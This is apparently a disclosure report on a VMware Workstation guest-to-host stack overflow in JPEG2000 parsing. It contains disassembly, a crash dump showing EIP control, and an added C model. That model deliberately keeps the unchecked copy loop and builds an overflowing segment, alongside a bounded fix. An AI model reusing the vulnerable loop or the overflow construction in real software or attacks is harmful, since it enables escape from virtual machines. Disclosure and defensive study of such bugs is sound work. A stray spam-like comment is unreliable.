VMware Workstation: vprintproxy.exe stack overflow when processing a JPEG2000

Project Member Reported by kost...@google.com, Mar 11 2015
Version: VMware Workstation 11.1
Host Platform: Windows 8.1 amd64

Summary:
Printer virtualization under VMware Workstation involves a vprintproxy.exe process launched by vmware-vmx.exe on the Host. It will receive and process EMFSPOOL files sent by a Guest on its COM1 port, if a virtual printer has been added to the VM hardware (default). Several vulnerabilities in this component allow an unprivileged Guest user to execute code on the Host.

Description:
This vulnerability looks conspicuously like CVE-2012-0897, and it might very well be that the same JPEG2000 library was used in both cases but has been left unpatched in TPView.dll for the last couple of years. Anyway, when processing record 0xff5c (Quantization Default), a user can trigger an overflow of a stack buffer in a function without a stack cookie, which leads to direct EIP control.

.text:10048788 8D 7C 24 3C                 lea     edi, [esp+100h+var_C4]
.text:1004878C
.text:1004878C loc_1004878C:                           ; CODE XREF: JP2_0FF5Ch+128j
.text:1004878C 8B 4C 24 14                 mov     ecx, [esp+100h+var_EC]
.text:10048790 8B 54 24 1C                 mov     edx, [esp+100h+var_E4]
.text:10048794 51                          push    ecx
.text:10048795 57                          push    edi
.text:10048796 52                          push    edx
.text:10048797 E8 C4 43 00 00              call    kk_JP2_ReadWord         ; arg_4=&result
.text:1004879C 83 C4 0C                    add     esp, 0Ch
.text:1004879F 85 C0                       test    eax, eax
.text:100487A1 0F 85 5E 02 00 00           jnz     loc_10048A05
.text:100487A7 8B 44 24 14                 mov     eax, [esp+100h+var_EC]
.text:100487AB 83 C7 02                    add     edi, 2
.text:100487AE 83 C0 02                    add     eax, 2
.text:100487B1 45                          inc     ebp
.text:100487B2 3B EB                       cmp     ebp, ebx
.text:100487B4 89 44 24 14                 mov     [esp+100h+var_EC], eax
.text:100487B8 7C D2                       jl      short loc_1004878C
.text:100487BA E9 B8 00 00 00              jmp     loc_10048877

Here, the JPEG2000 parser will just read words as long as the size of the 0xff5c record permits it, while the destination buffer can only hold 0xc4 bytes at most.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
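The loop above, modelled in C as an added example beside a bounded rewrite. This is not code from the report, from VMware or from TPView.dll: the function and type names (jp2_read_word, qcd_header, qcd_parse_unchecked, qcd_parse_checked, build_qcd, struct qcd_frame) are invented for the example, the QCD layout follows JPEG 2000 Part 1 (marker, Lqcd, Sqcd, then 16-bit SPqcd words, so the word count is (Lqcd - 3) / 2), and the frame layout is an inference from the listing: var_C4 starts at esp+0x3c, the frame is 0x100 bytes, so the 0xc4-byte buffer ends exactly at the return-address slot and words 98 and 99 of the record overwrite it.

```c
/* Added example, not VMware's or TPView's code; names and frame layout are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define QCD_BUF_WORDS (0xc4 / 2)   /* the 0xc4-byte buffer holds 98 words */
/* Assumed frame: var_C4 runs from esp+0x3c to esp+0x100, where the saved
 * return address sits, so words 98 and 99 land on EIP. */
struct qcd_frame {
    uint16_t words[QCD_BUF_WORDS];
    uint32_t ret_addr;
};

/* Stand-in for kk_JP2_ReadWord: big-endian 16-bit read, -1 if short. */
static int jp2_read_word(const uint8_t *p, const uint8_t *end, uint16_t *out)
{
    if (end - p < 2) return -1;
    *out = (uint16_t)((p[0] << 8) | p[1]);
    return 0;
}

/* Marker 0xff5c, Lqcd, Sqcd: yields the word count Lqcd implies (ebx). */
static int qcd_header(const uint8_t *seg, size_t seg_len, size_t *nwords)
{
    uint16_t lqcd;
    if (seg_len < 5 || seg[0] != 0xff || seg[1] != 0x5c) return -1;
    if (jp2_read_word(seg + 2, seg + seg_len, &lqcd) || lqcd < 3) return -1;
    *nwords = (lqcd - 3u) / 2;   /* Lqcd counts itself and Sqcd */
    return 0;
}

/* Vulnerable shape: the loop runs ebp < ebx with ebx taken from the stream and
 * never compared with the buffer. Returns words written, -1 on short input.
 * Only run it on streams whose writes stay inside the modelled frame. */
int qcd_parse_unchecked(const uint8_t *seg, size_t seg_len, struct qcd_frame *fr)
{
    size_t n;
    if (qcd_header(seg, seg_len, &n)) return -1;
    const uint8_t *p = seg + 5, *end = seg + seg_len;
    uint8_t *dst = (uint8_t *)fr;            /* edi = &var_C4 */
    for (size_t i = 0; i < n; i++, p += 2) {
        uint16_t w;
        if (jp2_read_word(p, end, &w)) return -1;
        memcpy(dst + 2 * i, &w, sizeof w);   /* leaves words[] once i >= 98 */
    }
    return (int)n;
}

/* Hardened shape: a segment longer than the data or than the buffer is an error. */
int qcd_parse_checked(const uint8_t *seg, size_t seg_len,
                      uint16_t *out, size_t out_words, size_t *n_out)
{
    size_t n;
    if (qcd_header(seg, seg_len, &n)) return -1;
    if (5 + 2 * n > seg_len) return -1;      /* Lqcd claims bytes we do not have */
    if (n > out_words) return -1;            /* the check the TPView loop lacks */
    const uint8_t *p = seg + 5, *end = seg + seg_len;
    for (size_t i = 0; i < n; i++, p += 2)
        if (jp2_read_word(p, end, &out[i])) return -1;
    *n_out = n;
    return 0;
}

/* Constructed QCD segment of n words, all `fill`. Returns its length, 0 on error. */
size_t build_qcd(uint8_t *buf, size_t cap, size_t n, uint16_t fill)
{
    size_t body = 3 + 2 * n;                 /* Lqcd + Sqcd + words */
    if (body > 0xffff || 2 + body > cap) return 0;
    buf[0] = 0xff; buf[1] = 0x5c;
    buf[2] = (uint8_t)(body >> 8); buf[3] = (uint8_t)body;
    buf[4] = 0x42;                           /* Sqcd: scalar expounded (assumed) */
    for (size_t i = 0; i < n; i++) {
        buf[5 + 2 * i] = (uint8_t)(fill >> 8);
        buf[6 + 2 * i] = (uint8_t)fill;
    }
    return 2 + body;
}

/* 100 words of 0x4242 through the unchecked loop: returns the clobbered
 * return address (0x42424242, matching the crash dump). */
uint32_t demo_eip_control(void)
{
    uint8_t seg[256];
    struct qcd_frame fr = { {0}, 0x11111111 }; /* arbitrary stand-in return */
    size_t len = build_qcd(seg, sizeof seg, QCD_BUF_WORDS + 2, 0x4242);
    if (!len || qcd_parse_unchecked(seg, len, &fr) < 0) return 0;
    return fr.ret_addr;
}

/* An n-word segment through the checked parser: -1 if rejected, else n. */
long demo_checked(size_t n)
{
    uint8_t seg[256];
    uint16_t out[QCD_BUF_WORDS];
    size_t got = 0, len = build_qcd(seg, sizeof seg, n, 0x4242);
    if (!len || qcd_parse_checked(seg, len, out, QCD_BUF_WORDS, &got)) return -1;
    return (long)got;
}

int main(void)
{
    printf("unchecked: ret_addr = 0x%08x\n", (unsigned)demo_eip_control());
    printf("checked: 100 words -> %ld, 4 words -> %ld\n", demo_checked(100), demo_checked(4));
    return 0;
}
```

The unchecked parser is deliberately written to keep the bug: with the 100-word segment it stays inside the modelled struct, but any larger Lqcd would write past it just as TPView writes past esp+0x100. The fix is the single comparison of the stream-derived count against the capacity before the copy loop, plus the check that Lqcd does not exceed the bytes actually present, which is what kk_JP2_ReadWord's error path handles word by word in the original.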
Mar 11 2015: comment without text

Apr 3 2015: Adding current version of the exploit.

Jun 2 2015: comment without text
Jun 2 2015: comment without text
Jun 9 2015: comment without text
Jun 9 2015: comment without text

Jun 9 2015: VMware advisory VMSA-2015-0004: https://www.vmware.com/security/advisories/VMSA-2015-0004.html

Jan 13 2016: Very smart software, it's running fast...
Sample dump, demonstrating eip control:

0:013:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

FAULTING_IP:
unknown!noop+0
42424242 ??              ???

EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0000000042424242
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000008
   Parameter[1]: 0000000042424242
Attempt to execute non-executable address 0000000042424242

CONTEXT:  0000000000000000 -- (.cxr 0x0;r)
eax=00000000 ebx=0e7cdba0 ecx=00000037 edx=0e6feea4 esi=00000037 edi=0b178690
eip=42424242 esp=0e6fee6c ebp=0e7cff5c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
42424242 ??              ???

FAULTING_THREAD:  0000000000001024
PROCESS_NAME:  vprintproxy.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1:  0000000000000008
EXCEPTION_PARAMETER2:  0000000042424242
WRITE_ADDRESS:  0000000042424242

FOLLOWUP_IP:
unknown!noop+0
42424242 ??              ???

FAILED_INSTRUCTION_ADDRESS:
unknown!noop+0
42424242 ??              ???

NTGLOBALFLAG:  2000000
APPLICATION_VERIFIER_FLAGS:  0
APP:  vprintproxy.exe
ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre
IP_ON_HEAP:  0000000042424242
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 42424242
BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_INVALID_ZEROED_STACK
PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_INVALID
DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
0e6fee68 43434343 44444444 45454545 0e6feea4 0x42424242
0e6feea4 0b171883 0e7cff5c 0e6feec4 00000000 0x43434343
0e6feed4 0b15265e 0e6fef18 0b1527ce 00000000 TPView!JP2_Decompress_Start+0x353
0e6fef2c 0b15fb0e 00000001 0e7a9ff8 42424242 TPView+0x2265e
0e6fef30 00000000 0e7a9ff8 42424242 0b35dcd0 TPView!TPRenderW+0x1e70

STACK_COMMAND:  .cxr 0x0 ; kb
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  unknown!noop+0
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: unknown
IMAGE_NAME:  unknown
DEBUG_FLR_IMAGE_TIMESTAMP:  0
FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_c0000005_unknown!noop
BUCKET_ID:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_INVALID_ZEROED_STACK_BAD_IP_unknown!noop+0
ANALYSIS_SOURCE:  UM
FAILURE_ID_HASH_STRING:  um:software_nx_fault_invalid_c0000005_unknown!noop
FAILURE_ID_HASH:  {89fd3157-762b-6f3b-1bc7-04be4535c89a}
Followup: MachineOwner
---------